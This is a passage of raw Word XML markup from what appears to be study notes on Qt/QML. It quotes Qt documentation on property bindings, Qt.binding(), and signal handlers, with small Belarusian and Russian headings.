          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>below initially ensures that its</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height</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is always twice its</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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. However, when the space key is pressed, the current value of</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width*3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will be assigned to</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height</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value. After that,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will remain fixed at this value, even if the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The assignment of the static value removes the binding.</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import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QtQuick</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2.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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100</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height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width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focus</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true</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Keys</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onSpacePressed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height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width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957A2A" w:rsidRPr="00D815C8" w:rsidRDefault="00957A2A" w:rsidP="00957A2A">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957A2A" w:rsidRPr="00D815C8" w:rsidRDefault="00957A2A" w:rsidP="00957A2A">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If the intention is to give the rectangle a fixed height and stop automatic updates, then this is not a problem. However, if the intention is to establish a new relationship between</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width</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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height</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, then the new binding expression must be wrapped in the Qt.binding() function instead:</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import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QtQuick</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2.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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100</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height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width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focus</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true</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Keys</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onSpacePressed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height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binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> width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957A2A" w:rsidRPr="00D815C8" w:rsidRDefault="00957A2A" w:rsidP="00957A2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957A2A" w:rsidRPr="00D815C8" w:rsidRDefault="00957A2A" w:rsidP="00957A2A">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957A2A" w:rsidRPr="00D815C8" w:rsidRDefault="00957A2A" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Важнейшае прызначэнне </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt.binding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B70199" w:rsidRPr="00D815C8" w:rsidRDefault="00B70199"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When creating a property binding from JavaScript, the </w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to refer to the object which receives the binding. This is </w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>helpful for resolving ambiguities with property names</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E41312" w:rsidRPr="00D815C8" w:rsidRDefault="00E41312" w:rsidP="003F208F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc382058566"/>
      <w:bookmarkStart w:id="53" w:name="_Toc483000529"/>
      <w:bookmarkStart w:id="54" w:name="_Toc483003570"/>
      <w:bookmarkStart w:id="55" w:name="_Toc483603889"/>
      <w:bookmarkStart w:id="56" w:name="_Toc483605109"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>СИСТЕМА</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>СИГНАЛОВ</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ОБРАБОТЧИКОВ</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>СИГНАЛОВ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-syntax-signals.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000A798F" w:rsidRPr="00D815C8" w:rsidRDefault="000A798F" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>To receive a notification when a particular signal is emitted for a particular object, the object definition should declare a signal handler named</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i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on&lt;Signal&gt;</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where</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i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Signal&gt;</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is the name of the signal, with the first letter capitalized. The signal handler should contain the JavaScript code to be executed when the signal handler is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="00E41312" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A signal is automatically emitted when the value of a QML property changes. This type of signal is a</w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property change signal</w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and signal handlers for these signals are written in the form</w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on&lt;Property&gt;Changed</w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="004A141A" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;Property&gt;</w:t>
      </w:r>
